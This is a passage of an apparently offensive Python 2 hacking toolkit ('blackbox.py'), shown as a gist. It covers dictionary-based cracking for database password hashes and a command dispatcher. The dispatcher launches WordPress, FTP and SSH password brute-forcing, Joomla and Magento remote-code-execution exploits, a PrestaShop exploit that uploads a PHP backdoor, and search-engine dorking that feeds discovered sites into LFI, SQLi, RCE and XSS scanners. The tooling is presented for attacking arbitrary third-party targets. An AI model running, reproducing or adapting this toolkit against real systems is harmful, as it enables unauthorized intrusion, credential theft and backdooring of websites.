print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+has+" : "+word+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
def mssql2000(self,wordlist, ha): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" MSSQL2000 HASH PATH : "+ha+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
wordlist = wordlist.readlines() | |
ha = open(ha, "r") | |
ha = ha.readlines() | |
var=0 | |
for word in wordlist: | |
word=word.strip() | |
for has in ha: | |
has = has.strip() | |
h = m20.verify(has,word) | |
if h ==True: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n\t"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+has+" : "+word+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
def mssql2005(self,wordlist, ha): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" MSSQL2005 HASH PATH : "+ha+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
wordlist = wordlist.readlines() | |
ha = open(ha, "r") | |
ha = ha.readlines() | |
var=0 | |
for word in wordlist: | |
word=word.strip() | |
for has in ha: | |
has = has.strip() | |
h = m25.verify(has,word) | |
if h ==True: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n\t"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+has+" : "+word+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
#mysql323 | |
def mysql323(self,wordlist, ha): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" MYSQL323 HASH PATH : "+ha+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
wordlist = wordlist.readlines() | |
ha = open(ha, "r") | |
ha = ha.readlines() | |
var=0 | |
for word in wordlist: | |
word=word.strip() | |
for has in ha: | |
has = has.strip() | |
h = mysql323.verify(has,word) | |
if h ==True: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n\t"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+has+" : "+word+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
#mysql41 | |
def mysql41(self,wordlist, ha): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" MYSQL41 HASH PATH : "+ha+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
wordlist = wordlist.readlines() | |
ha = open(ha, "r") | |
ha = ha.readlines() | |
var=0 | |
for word in wordlist: | |
word=word.strip() | |
for has in ha: | |
has = has.strip() | |
h = mysql41.verify(has,word) | |
if h ==True: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n\t"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+has+" : "+word+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
def oracle11(self,wordlist, ha): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" ORACLE HASH PATH : "+ha+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
wordlist = wordlist.readlines() | |
ha = open(ha, "r") | |
ha = ha.readlines() | |
var=0 | |
for word in wordlist: | |
word=word.strip() | |
for has in ha: | |
has = has.strip() | |
h = oracle11.verify(has,word) | |
if h ==True: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n\t"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+has+" : "+word+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
#################################### | |
## ## | |
## MAIN ## | |
## ## | |
#################################### | |
def __main__(): | |
__banner__() | |
for arg in sys.argv: | |
if (arg=="--help" or arg=="-h"): | |
__help__() | |
if (arg=="wordpress_brute"): | |
wp_hp = color.W+color.BOLD+sys.argv[0]+" wordpress_brute --url [URL OF TARGET] -u/--username [USERNAME OF ADMIN] -w/--wordlist [PASSWORD WORDLIST]\nExample: "+sys.argv[0]+" wordpress_brute xxxxxxxx.com -w /root/rockyou.txt"+color.ENDC | |
parser = OptionParser(usage=wp_hp) | |
parser.add_option("--url", | |
help="URL OF Target") | |
parser.add_option("--username","-u", | |
help="Username of Wordpress") | |
parser.add_option("--wordlist","-w", | |
help="Wordlist for attack target") | |
(options,args) = parser.parse_args() | |
url = options.url | |
username = options.username | |
wordlist = options.wordlist | |
if url and username and wordlist: | |
BruteForce().wordpress(url, username, wordlist) | |
break | |
errors = [] | |
if (url == None): | |
errors.append("[-] No URL specified.") | |
if (username == None): | |
errors.append("[-] No USERNAME specified.") | |
if (wordlist == None): | |
errors.append("[-] No WORDLIST path specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg == "dns_info"): | |
di_hp = color.W+color.BOLD+sys.argv[0]+" dns_info --ip [IP] --yougetsignal/--viewdns/--hackertarget [SELECT JUST ONE SERVICE!] \nExample: "+sys.argv[0]+" dns_info --ip google.com --yougetsignal"+color.ENDC | |
parser = OptionParser(usage=di_hp) | |
parser.add_option("--ip", | |
help="Parse IP address") | |
parser.add_option("--yougetsignal","-y", | |
help="Get website from yougetsignal",action="store_true") | |
parser.add_option("--viewdns","-v", | |
help="Get website from viewdns",action="store_true") | |
parser.add_option("--hackertarget","-t", | |
help="Get website from hackertarget",action="store_true") | |
(options,args) = parser.parse_args() | |
ip = options.ip | |
yougetsignal = options.yougetsignal | |
viewdns = options.viewdns | |
hackertarget = options.hackertarget | |
if ip and yougetsignal==True: | |
dnsinfo().yougetsignal(ip) | |
if ip and viewdns==True: | |
dnsinfo().viewdns(ip) | |
if ip and hackertarget==True: | |
dnsinfo().hackertarget(ip) | |
errors = [] | |
if (ip == None): | |
errors.append("[-] No IP specified.") | |
if (viewdns or hackertarget or yougetsignal == None): | |
errors.append("[-] No SERVICE specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg=="rce_joomla"): | |
rj_hp = color.W+color.BOLD+sys.argv[0]+" rce_joomla -w/--wordlist [SELECT PATH OF URLs SAVED IN WORDLIST]\nExample: "+sys.argv[0]+" rce_joomla -w joomla3.txt"+color.ENDC | |
parser = OptionParser(usage=rj_hp) | |
parser.add_option("--wordlist","-w", | |
help="wordlist path") | |
(options,args) = parser.parse_args() | |
wordlist = options.wordlist | |
if wordlist: | |
exploit().joomla(wordlist) | |
errors = [] | |
if (wordlist == None): | |
errors.append("[-] No WORDLIST specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg=="rce_magento"): | |
rm_hp = color.W+color.BOLD+sys.argv[0]+" rce_magento -w/--wordlist [SELECT PATH OF URLs SAVED IN WORDLIST]\nExample: "+sys.argv[0]+" rce_magento -w magento.txt"+color.ENDC | |
parser = OptionParser(usage=rm_hp) | |
parser.add_option("--wordlist","-w", | |
help="Wordlist path") | |
(options,args) = parser.parse_args() | |
wordlist = options.wordlist | |
if wordlist: | |
exploit().magento(wordlist) | |
errors = [] | |
if (wordlist == None): | |
errors.append("[-] No WORDLIST specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg=="google_dorker"): | |
gd_hp = color.W+color.BOLD+sys.argv[0]+' google_dorker -d/--dork="[DORK]" --level [NUMBER OF PAGE] --[LFI/RCE/XSS/SQLi!]\nExample: '+sys.argv[0]+' google_dorker --dork="php?id=" --level 10 '+color.ENDC | |
parser = OptionParser(usage=gd_hp) | |
parser.add_option("--dork","-d", | |
help="Dork for get URL") | |
parser.add_option("--level",type=int,default=10, | |
help="Number of page to stop") | |
parser.add_option("--lfi", | |
help="Scan Founded website from LFI", action="store_true") | |
parser.add_option("--sqli", | |
help="Scan Founded website from SQLi", action="store_true") | |
parser.add_option("--rce", | |
help="Scan Founded website from RCE", action="store_true") | |
parser.add_option("--xss", | |
help="Scan Founded website from XSS", action="store_true") | |
(options,args) = parser.parse_args() | |
dork = options.dork | |
level = options.level | |
lfi = options.lfi | |
sqli = options.sqli | |
rce = options.rce | |
xss = options.xss | |
if dork and level is not None: | |
dorker().google(dork, 0, level) | |
if dork and level is not None and lfi==True: | |
print (color.R+color.BOLD+"LFI Scanner : "+color.ENDC) | |
gurl= dorker().gurl | |
for urll in gurl: | |
urll= urll.strip() | |
scanner().lfi(urll) | |
if dork and level is not None and sqli==True: | |
print (color.R+color.BOLD+"SQLi Scanner : "+color.ENDC) | |
gurl= dorker().gurl | |
for urll in gurl: | |
urll= urll.strip() | |
scanner().sqli(urll) | |
if dork and level is not None and rce==True: | |
print (color.R+color.BOLD+"RCE Scanner : "+color.ENDC) | |
gurl= dorker().gurl | |
for urll in gurl: | |
urll= urll.strip() | |
scanner().rce(urll) | |
if dork and level is not None and xss==True: | |
print (color.R+color.BOLD+"XSS Scanner : "+color.ENDC) | |
gurl= dorker().gurl | |
for urll in gurl: | |
urll= urll.strip() | |
scanner().xss(urll) | |
errors = [] | |
if (dork == None): | |
errors.append("[-] No DORK specified.") | |
if (level == None): | |
errors.append("[-] No PAGE specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg=="bing_dorker"): | |
gd_hp = color.W+color.BOLD+sys.argv[0]+' bing_dorker --ip [IP OF TARGET] -d/--dork="[DORK]" --lfi [IF YOU WANT TO SCAN WEBSITE FROM LFI!]\nExample: '+sys.argv[0]+' bing_dorker --ip 192.xx.xxx.xxx --dork="php?id="'+color.ENDC | |
parser = OptionParser(usage=gd_hp) | |
parser.add_option("--ip") | |
parser.add_option("--dork","-d", | |
help="Dork for get URL") | |
parser.add_option("--lfi", | |
help="Scan Founded website from LFI", action="store_true") | |
parser.add_option("--sqli", | |
help="Scan Founded website from SQLi", action="store_true") | |
parser.add_option("--rce", | |
help="Scan Founded website from RCE", action="store_true") | |
parser.add_option("--xss", | |
help="Scan Founded website from XSS", action="store_true") | |
(options,args) = parser.parse_args() | |
ip = options.ip | |
dork = options.dork | |
lfi = options.lfi | |
sqli = options.sqli | |
rce = options.rce | |
xss = options.xss | |
if ip and dork: | |
dorker().bing(ip,dork) | |
if ip and dork and lfi==True: | |
print (color.R+color.BOLD+"LFI Scanner : "+color.ENDC) | |
burl= dorker().burl | |
for urll in burl: | |
urll= urll.strip() | |
scanner().lfi(urll) | |
if ip and dork and sqli==True: | |
print (color.R+color.BOLD+"SQLi Scanner : "+color.ENDC) | |
burl= dorker().burl | |
for urll in burl: | |
urll= urll.strip() | |
scanner().sqli(urll) | |
if ip and dork and rce==True: | |
print (color.R+color.BOLD+"RCE Scanner : "+color.ENDC) | |
burl= dorker().burl | |
for urll in burl: | |
urll= urll.strip() | |
scanner().rce(urll) | |
if ip and dork and xss==True: | |
print (color.R+color.BOLD+"XSS Scanner : "+color.ENDC) | |
burl= dorker().burl | |
for urll in burl: | |
urll= urll.strip() | |
scanner().xss(urll) | |
errors = [] | |
if (ip == None): | |
errors.append("[-] No IP specified.") | |
if (dork == None): | |
errors.append("[-] No DORK specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg=="hash_killer"): | |
hk_hp = color.W+color.BOLD+sys.argv[0]+' hash_killer -w/--wordlist [PATH OF WORDLIST] --md5 or --sha1 etc... [PATH OF HASHs]\nExample: '+sys.argv[0]+' -w /root/rockyou.txt --md5 hash.txt'+color.ENDC | |
parser = OptionParser(usage=hk_hp) | |
parser.add_option("-w","--wordlist",help="Path Of Wordlist !") | |
parser.add_option("--md5", help="Path of MD5 hash") | |
parser.add_option("--sha1", help="Path of SHA1 hash") | |
parser.add_option("--sha224", help="Path of SHA224 hash") | |
parser.add_option("--sha256", help="Path of SHA256 hash") | |
parser.add_option("--sha384", help="Path of SHA384 hash") | |
parser.add_option("--sha512", help="Path of SHA512 hash") | |
parser.add_option("--ntlm", help="Path of NTLM hash") | |
parser.add_option("--mssql2000", help="Path of MSSQL2000 hash") | |
parser.add_option("--mssql2005", help="Path of MSSQL2005 hash") | |
parser.add_option("--mysql323", help="Path of MYSQL323 hash") | |
parser.add_option("--mysql41", help="Path of MYSQL41 hash") | |
parser.add_option("--oracle11", help="Path of ORACLE11 hash") | |
(options,args) = parser.parse_args() | |
wordlist = options.wordlist | |
md5 = options.md5 | |
sha1 = options.sha1 | |
sha224 = options.sha224 | |
sha256 = options.sha256 | |
sha384 = options.sha384 | |
sha512 = options.sha512 | |
ntlm = options.ntlm | |
mssql2000 = options.mssql2000 | |
mssql2005 = options.mssql2005 | |
mysql323 = options.mysql323 | |
mysql41 = options.mysql41 | |
oracle11 = options.oracle11 | |
crack = cracker() | |
if md5 and wordlist: | |
crack.md5(wordlist, md5) | |
if sha1 and wordlist: | |
crack.sha1(wordlist, sha1) | |
if sha224 and wordlist: | |
crack.sha224(wordlist, sha224) | |
if sha256 and wordlist: | |
crack.sha256(wordlist, sha256) | |
if sha384 and wordlist: | |
crack.sha384(wordlist, sha384) | |
if sha512 and wordlist: | |
crack.sha512(wordlist, sha512) | |
if ntlm and wordlist: | |
crack.ntlm(ntlm,wordlist) | |
if mssql2000 and wordlist: | |
crack.mssql2000(mssql2000,wordlist) | |
if mssql2005 and wordlist: | |
crack.mssql2005(mssql2005,wordlist) | |
if mysql323 and wordlist: | |
crack.mysql323(mysql323,wordlist) | |
if mysql41 and wordlist: | |
crack.mysql41(mysql41,wordlist) | |
if oracle11 and wordlist: | |
crack.oracle11(oracle11,wordlist) | |
if (arg=="-u" or arg=="--update"): | |
__update__() | |
if (arg=="presta_exploit"): | |
pe_hp = color.W+color.BOLD+sys.argv[0]+' presta_exploit -l/--lists [PATH OF WORDLIST] -s/--script [PATH OF .php BACKDOOR]\nExample: '+sys.argv[0]+' presta_exploit -l prestalinks.txt -s upload.php'+color.ENDC | |
parser = OptionParser(usage=pe_hp) | |
parser.add_option("--lists","-l", | |
help="wordlist path") | |
parser.add_option("--script","-s", | |
help="Path of php backdoor") | |
(options,args) = parser.parse_args() | |
lists = options.lists | |
script = options.script | |
if lists and script: | |
exploit().presta_run(lists,script) | |
errors=[] | |
if (lists == None): | |
errors.append("[-] No LISTS specified.") | |
if (script == None): | |
errors.append("[-] No SCRIPT BACKDOOR .php specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg=="ftp_brute"): | |
fb_hp = color.W+color.BOLD+sys.argv[0]+' ftp_brute --ip [IP ADDRESS] -u/--username [USERNAME OF FTP LOGIN] -w/--wordlist [PATH OF WORDLIST]\nExample: '+sys.argv[0]+' ftp_brute --ip 192.168.xxx.xx -u root -w password.txt'+color.ENDC | |
parser = OptionParser(usage=fb_hp) | |
parser.add_option("--ip", | |
help="IP address Of FTP SERVER") | |
parser.add_option("--username","-u", | |
help="USERNAME OF FTP SERVER") | |
parser.add_option("--wordlist","-w", | |
help="WORDLIST PATH") | |
(options,args) = parser.parse_args() | |
ip = options.ip | |
username = options.username | |
wordlist = options.wordlist | |
if ip and username and wordlist: | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" USERNAME : "+username+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST : "+wordlist+color.ENDC) | |
wordlist = open(wordlist,"r") | |
wordlist = wordlist.readlines() | |
for password in wordlist: | |
password=password.strip() | |
BruteForce().ftp_brute(ip,username,password) | |
errors=[] | |
if (ip == None): | |
errors.append("[-] No IP specified.") | |
if (username == None): | |
errors.append("[-] No USERNAME specified.") | |
if (wordlist == None): | |
errors.append("[-] No WORDLIST specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg=="ssh_brute"): | |
sb_hp = color.W+color.BOLD+sys.argv[0]+' ssh_brute --ip [IP ADDRESS] -u/--username [USERNAME OF SSH LOGIN] -w/--wordlist [PATH OF WORDLIST]\nExample: '+sys.argv[0]+' ssh_brute --ip 192.168.xxx.xx -u root -w password.txt'+color.ENDC | |
parser = OptionParser(usage=sb_hp) | |
parser.add_option("--ip", | |
help="IP address Of SSH SERVER") | |
parser.add_option("--username","-u", | |
help="USERNAME OF SSH SERVER") | |
parser.add_option("--wordlist","-w", | |
help="WORDLIST PATH") | |
(options,args) = parser.parse_args() | |
ip = options.ip | |
username = options.username | |
wordlist = options.wordlist | |
if ip and username and wordlist: | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" USERNAME : "+username+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST : "+wordlist+color.ENDC) | |
wordlist = open(wordlist,"r") | |
wordlist = wordlist.readlines() | |
for password in wordlist: | |
password=password.strip() | |
BruteForce().ssh_brute(ip,username,password) | |
errors=[] | |
if (ip == None): | |
errors.append("[-] No IP specified.") | |
if (username == None): | |
errors.append("[-] No USERNAME specified.") | |
if (wordlist == None): | |
errors.append("[-] No WORDLIST specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg=="admin_brute"): | |
ab_hp = color.W+color.BOLD+sys.argv[0]+' admin_brute -u/--url [URL] --php --asp --cfm etc... [WEB]\nExample: '+sys.argv[0]+' admin_brute http://google.com --php'+color.ENDC | |
parser = OptionParser(usage=ab_hp) | |
parser.add_option("--url","-u", | |
help="URL FOR GET ADMIN PANEL") | |
parser.add_option("--php", | |
action="store_true") | |
parser.add_option("--asp", | |
action="store_true") | |
parser.add_option("--cfm", | |
action="store_true") | |
parser.add_option("--js", | |
action="store_true") | |
parser.add_option("--cgi", | |
action="store_true") | |
parser.add_option("--brf", | |
action="store_true") | |
(options,args) = parser.parse_args() | |
url = options.url | |
php = options.php | |
asp = options.asp | |
cfm = options.cfm | |
js = options.js | |
cgi = options.cgi | |
brf = options.brf | |
if url and php==True: | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" URL : "+url+color.ENDC) | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SOURCE : PHP"+color.ENDC) | |
admin_finder().php_admin(url) | |
if url and asp==True: | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" URL : "+url+color.ENDC) | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SOURCE : ASP"+color.ENDC) | |
admin_finder().asp_admin(url) | |
if url and cfm==True: | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" URL : "+url+color.ENDC) | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SOURCE : CFM"+color.ENDC) | |
admin_finder().cfm_admin(url) | |
if url and js==True: | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" URL : "+url+color.ENDC) | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SOURCE : JS"+color.ENDC) | |
admin_finder().js_admin(url) | |
if url and cgi==True: | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" URL : "+url+color.ENDC) | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SOURCE : CGI"+color.ENDC) | |
admin_finder().cgi_admin(url) | |
if url and brf==True: | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" URL : "+url+color.ENDC) | |
print (color.C+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SOURCE : BRF"+color.ENDC) | |
admin_finder().brf_admin(url) | |
errors=[] | |
if (ip == None): | |
errors.append("[-] No IP specified.") | |
if (php or asp or cfm or js or cgi or brf == None): | |
errors.append("[-] No SCRIPT specified.") | |
if (len(errors) > 0): | |
for error in errors: | |
print (color.BOLD+error+color.ENDC) | |
if (arg=="scan_list"): | |
sl_hp = color.W+color.BOLD+sys.argv[0]+' scan_list -l/--list [PATH] --[LFI/SQLi/RCE/XSS]\nExample: '+sys.argv[0]+' scan_list -l/--lists /path/to/list --sqli'+color.ENDC | |
parser = OptionParser(usage=sl_hp) | |
parser.add_option("--lists","-l", | |
help="LIST COUNTAIN URLs !") | |
parser.add_option("--sqli", | |
help="Scan Founded website from SQLi", action="store_true") | |
parser.add_option("--xss", | |
help="Scan Founded website from XSS", action="store_true") | |
parser.add_option("--rce", | |
help="Scan Founded website from RCE", action="store_true") | |
parser.add_option("--lfi", | |
help="Scan Founded website from LFI", action="store_true") | |
(options,args) = parser.parse_args() | |
lists = options.lists | |
sqli = options.sqli | |
xss = options.xss | |
rce = options.rce | |
lfi = options.lfi | |
if lists and sqli==True: | |
print (color.R+color.BOLD+"SQLi Scanner : "+color.ENDC) | |
lists = open(lists, "r") | |
lists = lists.readlines() | |
for i in lists: | |
i=i.strip() | |
scanner().sqli(i) | |
if lists and xss==True: | |
print (color.R+color.BOLD+"XSS Scanner : "+color.ENDC) | |
lists = open(lists, "r") | |
lists = lists.readlines() | |
for i in lists: | |
i=i.strip() | |
scanner().xss(i) | |
if lists and rce==True: | |
print (color.R+color.BOLD+"RCE Scanner : "+color.ENDC) | |
lists = open(lists, "r") | |
lists = lists.readlines() | |
for i in lists: | |
i=i.strip() | |
scanner().rce(i) | |
if lists and lfi==True: | |
print (color.R+color.BOLD+"LFI Scanner : "+color.ENDC) | |
lists = open(lists, "r") | |
lists = lists.readlines() | |
for i in lists: | |
i=i.strip() | |
scanner().lfi(i) | |
if (len(sys.argv)<=1): | |
print "help : python2 blackbox.py -h/--help" | |
print "Usage : python2 blackbox.py {module} --help" | |
if __name__ == '__main__': | |
try: | |
__main__() | |
except KeyboardInterrupt: | |
print (color.BOLD+color.Y+"Exiting Now !"+color.ENDC) | |
sys.exit(0) | |
except urllib2.HTTPError: | |
print (color.BOLD+color.Y+"Error, Retry Later !"+color.ENDC) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment